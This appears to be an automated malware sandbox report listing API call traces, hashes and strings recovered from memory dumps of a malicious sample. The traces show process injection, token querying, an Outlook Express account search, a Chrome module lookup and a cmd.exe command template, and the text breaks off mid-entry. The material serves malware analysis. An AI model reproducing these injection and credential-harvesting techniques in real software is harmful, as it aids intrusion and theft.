  • CreateThread.KERNEL32(00000000,00000000,001CDEFA,00000000,00000000,00000000), ref: 001CDFB2
  • CloseHandle.KERNEL32(00000000), ref: 001CDFBD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CDFCD
  • GetLastError.KERNEL32(?,001C4B89,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001CDFD3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DD61D, Relevance: 6.0, APIs: 4, Instructions: 29 Total matches: 151sleepmemory
Similarity
  • Total matches: 151
  • API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleep
  • String ID:
  • API String ID: 1512377870-0
  • Opcode ID: 16b51c5752f63ceec2f2a3999784c98dd23d7905f2455a362739d2d7a92f53ef
  • Instruction ID: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
  • Opcode Fuzzy Hash: E9C01273359991D2564D34E106E53AF8C49F8D67E001E5A43E6043544B6F4152E57F3E
  • Instruction Fuzzy Hash: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD626
  • Sleep.KERNEL32(0000000A,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001DD630
  • HeapFree.KERNEL32(00000000,001EB218), ref: 001DD658
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001D9963
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9980
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD674
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CA895, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134 Total matches: 52memorystring
Similarity
  • Total matches: 52
  • API ID: RtlAllocateHeaplstrcpy
  • String ID: http
  • API String ID: 1742432113-2541227442
  • Opcode ID: 2c65e63afd727239392329a5dc8ec7dad85dd519dd139d15832cb51e86589f08
  • Instruction ID: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
  • Opcode Fuzzy Hash: D501902A0149C24BD05B301680AA774D61EBFA15E6C8D1367EC8AFA15F2D8363562B1D
  • Instruction Fuzzy Hash: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001CA8C4
  • lstrcpy.KERNEL32(00000000,?), ref: 001CA8DE
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001C9D54: RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9E08
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C9D54: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D7222, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58 Total matches: 58
Similarity
  • Total matches: 58
  • API ID: mbstowcs
  • String ID: account{*}.oeaccount
  • API String ID: 103190477-4234512180
  • Opcode ID: db38bb75a22634db53e9cc12e14f7a3a7814f34f28c55422107802faa02d70e8
  • Instruction ID: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
  • Opcode Fuzzy Hash: 04D0C2234D14D5E3451392E458237BAF0225E0166298CA7B46631052D68D0035B2BF5E
  • Instruction Fuzzy Hash: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001D7252
  • mbstowcs.NTDLL ref: 001D7278
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C77DE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56 Total matches: 58memory
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: cmd /C "%s> %s1"
  • API String ID: 3817218409-3818503316
  • Opcode ID: 7cb6bc4750e7a2b71a7c8ec6f15424ada8eacba88be2c54c7f9c11c1ab560649
  • Instruction ID: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
  • Opcode Fuzzy Hash: B7E086B50124838B2027B466502AFB5F7463C511E054C261AFA625925B3A4231A6376C
  • Instruction Fuzzy Hash: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7E21, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46 Total matches: 59
Similarity
  • Total matches: 59
  • API ID: StrToIntExmemcpy
  • String ID: 0x
  • API String ID: 149130431-3225541890
  • Opcode ID: da5bbc278911b085aa6d66a47a0cf6d216f6515775abb5fb592028d0f4abd24f
  • Instruction ID: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
  • Opcode Fuzzy Hash: B3D0A750AA2F8381152564850252B35F667F8A2B537CC9F525E00D716A2F52B7762F0B
  • Instruction Fuzzy Hash: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
APIs
  • memcpy.NTDLL(?,?,?), ref: 001C7E65
  • StrToIntExA.SHLWAPI(00007830,00000001,00000000), ref: 001C7E77
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C6241, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24 Total matches: 56memory
Similarity
  • Total matches: 56
  • API ID: GetModuleHandleTlsAlloc
  • String ID: CHROME.DLL
  • API String ID: 618583884-1627437769
  • Opcode ID: ffb7a85a2e9683169558a98c7eabd5e151ffe081303fc3c2192e4f2d4ebb372b
  • Instruction ID: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
  • Opcode Fuzzy Hash: 9FC02BBC6446841A644631D45E6B2BC8C01E2D23D7D5D2B36EA3730C873F270DEBCA62
  • Instruction Fuzzy Hash: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
APIs
  • GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
  • TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
    • Part of subcall function 001CB2DA: HeapFree.KERNEL32(00000000,001CD6FE,00000000), ref: 001CB341
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2B66, Relevance: 5.2, APIs: 4, Instructions: 156 Total matches: 79memory
Similarity
  • Total matches: 79
  • API ID: CloseHandleGetLastErrorHeapFreememset
  • String ID:
  • API String ID: 1419005916-0
  • Opcode ID: 760449bbfbed289788199d7c06102e71ba99187f66d499b3f37ec5349a85ff82
  • Instruction ID: b48012bcd23b1c670ab121ab113a12c2be84c226dba6163ca56302e6d7a217ce
  • Opcode Fuzzy Hash: 4C1189C5015BD382E6772E01A8A0F60D2429F86B76E4EA731C4BF745DE3D802024B776
  • Instruction Fuzzy Hash: b48012bcd23b1c670ab121ab113a12c2be84c226dba6163ca56302e6d7a217ce
APIs
    • Part of subcall function 001C24B7: lstrlen.KERNEL32(001C2246,?,00000000,00000000,001C2B9B,00000000,001C2246,?,00000000,?), ref: 001C24C1
    • Part of subcall function 001C24B7: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C24D6
    • Part of subcall function 001C24B7: HeapFree.KERNEL32(00000000,00000000,001C71E8), ref: 001C251D
  • memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C7341: GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
    • Part of subcall function 001C7341: CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
    • Part of subcall function 001C7341: GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
    • Part of subcall function 001C7341: CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
    • Part of subcall function 001C7341: lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
    • Part of subcall function 001C7341: lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
    • Part of subcall function 001C7341: HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
    • Part of subcall function 001C7341: CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
  • CloseHandle.KERNEL32(?), ref: 001C2C13
    • Part of subcall function 001C2A39: RtlImageNtHeader.NTDLL(00000094), ref: 001C2A5A
    • Part of subcall function 001C2A39: CloseHandle.KERNEL32(001EAF58), ref: 001C2AA0
    • Part of subcall function 001C2A39: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2B43
    • Part of subcall function 001C2A39: HeapFree.KERNEL32(00000000,00000000,.dll), ref: 001C2B52
    • Part of subcall function 001C164D: RtlImageNtHeader.NTDLL(?), ref: 001C165E
    • Part of subcall function 001C164D: RtlAllocateHeap.NTDLL(00000000,00000011), ref: 001C1685
    • Part of subcall function 001C164D: GetTickCount.KERNEL32 ref: 001C169C
    • Part of subcall function 001C164D: wsprintfA.USER32 ref: 001C16AC
    • Part of subcall function 001C164D: RegCreateKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C16E0
    • Part of subcall function 001C164D: StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 001C16F8
    • Part of subcall function 001C164D: lstrlen.KERNEL32(00000000), ref: 001C1702
    • Part of subcall function 001C164D: RegCloseKey.ADVAPI32(?), ref: 001C171E
    • Part of subcall function 001C164D: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C172C
    • Part of subcall function 001C1A08: RtlImageNtHeader.NTDLL ref: 001C1A48
    • Part of subcall function 001C1A08: GetCurrentThreadId.KERNEL32 ref: 001C1A5E
    • Part of subcall function 001C1A08: GetCurrentThread.KERNEL32 ref: 001C1A6F
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
    • Part of subcall function 001C1A08: RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
    • Part of subcall function 001C1A08: wsprintfA.USER32 ref: 001C1B50
    • Part of subcall function 001C1A08: lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
    • Part of subcall function 001C154D: RtlAdjustPrivilege.NTDLL(00000013,00000001,00000000,?), ref: 001C155B
    • Part of subcall function 001C154D: GetLastError.KERNEL32(?,001C2CD4), ref: 001C1572
    • Part of subcall function 001C1586: RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 001C159D
    • Part of subcall function 001C1586: GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,001C2CDE,00000094,00000000), ref: 001C15AF
    • Part of subcall function 001C1586: StrChrA.SHLWAPI(00000000,0000003A), ref: 001C15BC
    • Part of subcall function 001C1586: wsprintfA.USER32 ref: 001C15D0
    • Part of subcall function 001C1586: CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 001C15E6
    • Part of subcall function 001C1586: GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 001C15FF
    • Part of subcall function 001C1586: WriteFile.KERNEL32(00000000,00000000), ref: 001C1607
    • Part of subcall function 001C1586: GetLastError.KERNEL32 ref: 001C1615
    • Part of subcall function 001C1586: CloseHandle.KERNEL32(00000000), ref: 001C161E
    • Part of subcall function 001C1586: GetLastError.KERNEL32(?,00000000,?,001C2CDE,00000094,00000000), ref: 001C162F
    • Part of subcall function 001C1586: HeapFree.KERNEL32(00000000,00000000), ref: 001C163F
    • Part of subcall function 001CB83A: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001C14F5,?,00000000,00000000,00000000,00000006), ref: 001CB858
    • Part of subcall function 001CB83A: wsprintfA.USER32 ref: 001CB876
    • Part of subcall function 001CB8EF: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 001CB919
    • Part of subcall function 001CB8EF: HeapFree.KERNEL32(00000000,00000000), ref: 001CB968
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C1E86: InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1E92
    • Part of subcall function 001C1E86: RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 001C1EAD
    • Part of subcall function 001C1E86: lstrcpy.KERNEL32(00000000,001EC508), ref: 001C1ECE
    • Part of subcall function 001C1E86: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C1EEF
    • Part of subcall function 001C1EFC: InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1F04
    • Part of subcall function 001C2416: lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
    • Part of subcall function 001C2416: RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
    • Part of subcall function 001C2416: lstrcpy.KERNEL32(00000008,?), ref: 001C2462
    • Part of subcall function 001C2416: CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
    • Part of subcall function 001C2416: CloseHandle.KERNEL32(00000000), ref: 001C2485
    • Part of subcall function 001C2416: GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
    • Part of subcall function 001C2416: HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
  • GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
    • Part of subcall function 001C1473: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C14AA
    • Part of subcall function 001C1473: wsprintfA.USER32 ref: 001C14CD
    • Part of subcall function 001C1473: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C14FE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D87D7, Relevance: 5.1, APIs: 4, Instructions: 110 Total matches: 409
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: f4522468b970ccd3281ff04b4b9d6df2f9b0077f1de15eaad5e61c015f0d6d70
  • Instruction ID: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
  • Opcode Fuzzy Hash: 2401C052096E60C8F032AD0A54AA77BF147FF917F6D0DFB0064C23028B4E81A1E61FC9
  • Instruction Fuzzy Hash: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
APIs
  • memset.NTDLL ref: 001D87FD
  • memcpy.NTDLL ref: 001D8825
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
  • GetLastError.KERNEL32(00000010,00000218,001E3E3D,00000100,?,00000318,00000008), ref: 001D883C
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,001E3E3D,00000100), ref: 001D891F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DE2F9, Relevance: 5.1, APIs: 4, Instructions: 70 Total matches: 113string
Similarity
  • Total matches: 113
  • API ID: lstrcpy$lstrlenmemcpy
  • String ID:
  • API String ID: 2435105219-0
  • Opcode ID: 389011caf0b95c7600b8c5e44240e3f54a572d070d9ef14607482dffdfcb44a1
  • Instruction ID: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
  • Opcode Fuzzy Hash: 19E06834C20EC8A2C527204C1072F45A784999153B9CDA3E7647629AD54E023016720F
  • Instruction Fuzzy Hash: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
APIs
  • lstrlen.KERNEL32(00000000,00000008,00000000,?,00000000,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE305
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE363
  • lstrcpy.KERNEL32(00000000,00000008), ref: 001DE373
  • lstrcpy.KERNEL32(00000000,00000000), ref: 001DE37F
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false

Process Name: cmd.exe Analysis ID: 53359

General

Root Process Name:d3d8sext.exe
Process MD5:AD7B9C14083B52BC532FBA5948342B98
Total matches:133
Initial Analysis Report:Open
Initial sample Analysis ID:53359
Initial sample SHA 256:CCABD8DAE39FBEF5B91051EB9A38E9C3B93CB9952B399D6F9F2B6C3F406FC979
Initial sample name:q0JgDgMXw4.exe

Similar Executed Functions

Function 001D99D2, Relevance: 10.6, APIs: 7, Instructions: 81 Total matches: 84native
Similarity
  • Total matches: 84
  • API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
  • String ID:
  • API String ID: 1776017925-0
  • Opcode ID: 14313892d018c28c1512d211c24bd9508d3a727c070e1f2f8c81eb1ee10ca15e
  • Instruction ID: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
  • Opcode Fuzzy Hash: 65E061A35807C6FB51DA20701C03DE6D691FE10790C4C5B26D4F82D1864E5574794B07
  • Instruction Fuzzy Hash: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
APIs
  • NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
  • NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
  • memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • NtClose.NTDLL(001EC638), ref: 001D9A84
  • NtClose.NTDLL(?), ref: 001D9A8E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B33880, Relevance: 7.6, APIs: 5, Instructions: 93 Total matches: 233nativethread
Similarity
  • Total matches: 233
  • API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 405287775-0
  • Opcode ID: 57d5b69842fa9f20cc0ac7374aaf72f9f3e4042206c472131978e9752df15512
  • Instruction ID: 4ec32f28258a742104229ce406441de6b2fcb2541c1b40aba7a151e3666b4461
  • Opcode Fuzzy Hash: 09F078400B9F90E6E812A68604A2F406692FF06E75E0EE32475F211B8A3F12311D8B06
  • Instruction Fuzzy Hash: 4ec32f28258a742104229ce406441de6b2fcb2541c1b40aba7a151e3666b4461
APIs
  • memset.NTDLL ref: 01B338A2
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 01B33995
    • Part of subcall function 01B33E68: NtAllocateVirtualMemory.NTDLL(01B338CA,00000000,00000000,01B338CA,00003000,00000040), ref: 01B33E99
    • Part of subcall function 01B33E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33EA0
    • Part of subcall function 01B33E68: SetLastError.KERNEL32(00000000), ref: 01B33EA7
    • Part of subcall function 01B33DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33DDD
  • memcpy.NTDLL(00000218,01B34F92,00000100,?,00010003,?,?,00000318,00000008), ref: 01B3391D
    • Part of subcall function 01B33E27: NtWriteVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,01B36114,?,01B31A67,?,00000004,01B324C1,00000004,?), ref: 01B33E45
    • Part of subcall function 01B33E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E54
    • Part of subcall function 01B33E27: SetLastError.KERNEL32(00000000,?,01B31A67,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000), ref: 01B33E5B
  • NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 01B33974
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33977
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B3278F, Relevance: 6.1, APIs: 4, Instructions: 79 Total matches: 297native
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: f060986f037786d6eff44f917c1f9cd1492eae5187663b5233982b63c154d879
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: A6E0C00114CEC4E7E9F2B8060843B2BA0507FC0942E5D7BA173A88952F1F20B012070A
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 01B327EA
  • memset.NTDLL ref: 01B3280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B3282B
  • NtClose.NTDLL(?), ref: 01B3283F
    • Part of subcall function 01B32750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 01B3277D
    • Part of subcall function 01B32750: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B32784
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001F1040, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 226 Total matches: 134native
Similarity
  • Total matches: 134
  • API ID: NtProtectVirtualMemory
  • String ID: z
  • API String ID: 1546459799-1657960367
  • Opcode ID: cf60b7cb83ce32be4ff946b1fad70a6d95e18f7d6e657a237c07f6ddb8ba3109
  • Instruction ID: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
  • Opcode Fuzzy Hash: C321CD43048F92C7E9BB64801117F962385FBA3C6AD88FB625EA0576571F0036079FAB
  • Instruction Fuzzy Hash: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
APIs
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F11E1
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F124B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665752385.001F1000.00000040.sdmp, Offset: 001F1000, based on PE: false
Function 01B33E68, Relevance: 4.5, APIs: 3, Instructions: 29 Total matches: 229memorynative
Similarity
  • Total matches: 229
  • API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3367774474-0
  • Opcode ID: 09b8888f5fea2438ba07c33a5d99fafd9b808ca60c6c542fde1a50af119b8c2c
  • Instruction ID: e51ca6432f7bc6597b8f598a7fc739d540f14ae035788901fc615611556d8d1a
  • Opcode Fuzzy Hash: 42C012800D5D81E6957F54890169A165197BB91600C3D73363184AD5807FA032190F09
  • Instruction Fuzzy Hash: e51ca6432f7bc6597b8f598a7fc739d540f14ae035788901fc615611556d8d1a
APIs
  • NtAllocateVirtualMemory.NTDLL(01B338CA,00000000,00000000,01B338CA,00003000,00000040), ref: 01B33E99
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33EA0
  • SetLastError.KERNEL32(00000000), ref: 01B33EA7
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B33DE6, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 238native
Similarity
  • Total matches: 238
  • API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3946382534-0
  • Opcode ID: 153371e7e4f27683f8f1e7324a073917f20e70acda51c493c57c8daf0af629c8
  • Instruction ID: c995cc5ffd7b2437847975390dfb1f6b652844ee00b7fe6512dbf475f9a5d32f
